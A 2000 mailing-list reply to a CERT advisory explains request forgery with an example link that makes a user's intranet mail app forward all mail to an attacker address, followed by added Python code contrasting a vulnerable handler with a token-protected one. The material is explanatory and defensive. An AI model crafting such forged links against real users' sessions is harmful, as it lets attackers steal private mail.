Re: Fwd: CERT Advisory CA-2000-02
From: sekurity () HOTMAIL COM (Cassius)
Date: Thu, 3 Feb 2000 22:11:36 GMT
The danger is also in variables. Pretend that I get you to click on this
link from within your custom intranet mail app.
http://intranet.example.com/mailbox.asp?action=forward&item=all&recipient=badguy () example
It would forward all of your mail to badguy () example com. This would work
because you already have a session with mailbox.asp.
Of course mailbox.asp is fake but you get the idea.
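A defender's view of the request described in the message above, as an added example that is not part of the original post or of any real mailbox.asp: the first handler acts on the session alone, the second accepts the forward action only as a POST carrying a per-session token. The function names, the session dictionary, the HMAC-derived token and the sample addresses are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qsl, urlsplit

SERVER_KEY = secrets.token_bytes(32)  # server-side secret, never sent to other sites

def new_session(sid):
    # Hypothetical session record; forwarded_to records what the handler did.
    return {"id": sid, "forwarded_to": []}

def issue_token(session):
    # Per-session token the application embeds in its own forms.
    return hmac.new(SERVER_KEY, session["id"].encode(), hashlib.sha256).hexdigest()

def mailbox_vulnerable(method, url, session, form=None):
    # Behaviour described in the post: an existing session alone authorises the action.
    query = dict(parse_qsl(urlsplit(url).query))
    if query.get("action") == "forward":
        session["forwarded_to"].append(query["recipient"])
    return 200

def mailbox_hardened(method, url, session, form=None):
    # State changes are refused on GET, so following a link cannot trigger them.
    query = dict(parse_qsl(urlsplit(url).query))
    if method != "POST":
        return 405 if query.get("action") == "forward" else 200
    form = form or {}
    if form.get("action") != "forward":
        return 200
    # A page on another site can submit a form, but cannot know this token.
    expected = issue_token(session).encode()
    if not hmac.compare_digest(form.get("token", "").encode(), expected):
        return 403
    session["forwarded_to"].append(form["recipient"])
    return 200

# Constructed request modelled on the link in the post.
LINK = ("http://intranet.example.com/mailbox.asp"
        "?action=forward&item=all&recipient=badguy@example.com")

if __name__ == "__main__":
    s = new_session("sess-1")
    print("vulnerable:", mailbox_vulnerable("GET", LINK, s), s["forwarded_to"])
    s = new_session("sess-2")
    print("hardened:  ", mailbox_hardened("GET", LINK, s), s["forwarded_to"])
```
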